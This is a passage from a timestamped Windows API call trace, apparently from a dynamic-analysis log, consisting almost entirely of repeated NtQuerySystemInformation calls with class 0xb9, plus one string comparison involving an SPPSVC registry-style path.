SystemInformation=0xa781ffdf50, Length=0x38, ResultLength=0x0) [0233.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde70, Length=0x28, ResultLength=0x0) [0233.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde70, Length=0x28, ResultLength=0x0) [0233.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf50, Length=0x38, ResultLength=0x0) [0233.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddd0, Length=0x20, ResultLength=0x0) [0233.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd50, Length=0x20, ResultLength=0x0) [0233.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd50, Length=0x20, ResultLength=0x0) [0233.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd50, Length=0x20, ResultLength=0x0) [0233.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf50, Length=0x38, ResultLength=0x0) [0233.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddd0, Length=0x20, ResultLength=0x0) [0233.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd60, Length=0x20, ResultLength=0x0) [0233.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd60, Length=0x20, ResultLength=0x0) [0233.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe020, Length=0x50, ResultLength=0x0) [0233.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdfa0, Length=0x28, ResultLength=0x0) [0233.237] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0233.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe020, Length=0x50, ResultLength=0x0) [0233.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe020, Length=0x50, ResultLength=0x0) [0233.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe020, Length=0x50, ResultLength=0x0) [0233.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf50, Length=0x38, ResultLength=0x0) [0233.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd80, Length=0x28, ResultLength=0x0) [0233.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd80, Length=0x28, ResultLength=0x0) [0233.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd80, Length=0x28, ResultLength=0x0) [0233.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddf0, Length=0x28, ResultLength=0x0) [0233.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf50, Length=0x38, ResultLength=0x0) [0233.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde70, Length=0x28, ResultLength=0x0) [0233.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde70, Length=0x28, ResultLength=0x0) [0233.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf50, Length=0x38, ResultLength=0x0) [0233.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddd0, Length=0x20, ResultLength=0x0) [0233.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd50, Length=0x20, ResultLength=0x0) [0233.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd50, Length=0x20, ResultLength=0x0) [0233.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd50, Length=0x20, ResultLength=0x0) [0233.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf50, Length=0x38, ResultLength=0x0) [0233.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddd0, Length=0x20, ResultLength=0x0) [0233.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd60, Length=0x20, ResultLength=0x0) [0233.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd60, Length=0x20, ResultLength=0x0) [0233.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdac0, Length=0x50, ResultLength=0x0) [0233.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdac0, Length=0x50, ResultLength=0x0) [0233.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdac0, Length=0x50, ResultLength=0x0) [0233.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x50, ResultLength=0x0) [0233.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x50, ResultLength=0x0) [0233.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x50, ResultLength=0x0) [0233.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x50, ResultLength=0x0) [0233.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8e0, Length=0x38, ResultLength=0x0) [0233.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd710, Length=0x28, ResultLength=0x0) [0233.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd710, Length=0x28, ResultLength=0x0) [0233.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd710, Length=0x28, ResultLength=0x0) [0233.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd710, Length=0x28, ResultLength=0x0) [0233.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd780, Length=0x28, ResultLength=0x0) [0233.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8e0, Length=0x38, ResultLength=0x0) [0233.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd800, Length=0x28, ResultLength=0x0) [0233.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd800, Length=0x28, ResultLength=0x0) [0233.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6a0, Length=0x20, ResultLength=0x0) [0233.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd620, Length=0x20, ResultLength=0x0) [0233.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd620, Length=0x20, ResultLength=0x0) [0233.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd620, Length=0x20, ResultLength=0x0) [0233.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8e0, Length=0x38, ResultLength=0x0) [0233.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8e0, Length=0x38, ResultLength=0x0) [0233.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd760, Length=0x20, ResultLength=0x0) [0233.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6f0, Length=0x20, ResultLength=0x0) [0233.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6f0, Length=0x20, ResultLength=0x0) [0233.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd10, Length=0x50, ResultLength=0x0) [0233.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd10, Length=0x50, ResultLength=0x0) [0233.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd10, Length=0x50, ResultLength=0x0) [0233.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc00, Length=0x50, ResultLength=0x0) [0233.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc00, Length=0x50, ResultLength=0x0) [0233.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc00, Length=0x50, ResultLength=0x0) [0233.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc00, Length=0x50, ResultLength=0x0) [0233.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb30, Length=0x38, ResultLength=0x0) [0233.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x28, ResultLength=0x0) [0233.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x28, ResultLength=0x0) [0233.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x28, ResultLength=0x0) [0233.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9d0, Length=0x28, ResultLength=0x0) [0233.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb30, Length=0x38, ResultLength=0x0) [0233.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda50, Length=0x28, ResultLength=0x0) [0233.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda50, Length=0x28, ResultLength=0x0) [0233.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb30, Length=0x38, ResultLength=0x0) [0233.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd930, Length=0x20, ResultLength=0x0) [0233.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd930, Length=0x20, ResultLength=0x0) [0233.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd930, Length=0x20, ResultLength=0x0) [0233.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb30, Length=0x38, ResultLength=0x0) [0233.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd940, Length=0x20, ResultLength=0x0) [0233.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd940, Length=0x20, ResultLength=0x0) [0233.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd10, Length=0x50, ResultLength=0x0) [0233.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd10, Length=0x50, ResultLength=0x0) [0233.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd10, Length=0x50, ResultLength=0x0) [0233.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc00, Length=0x50, ResultLength=0x0) [0233.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc00, Length=0x50, ResultLength=0x0) [0233.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc00, Length=0x50, ResultLength=0x0) [0233.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc00, Length=0x50, ResultLength=0x0) [0233.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb30, Length=0x38, ResultLength=0x0) [0233.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.287] NtQuerySystemInformation (SystemInformationClass=0xb9, 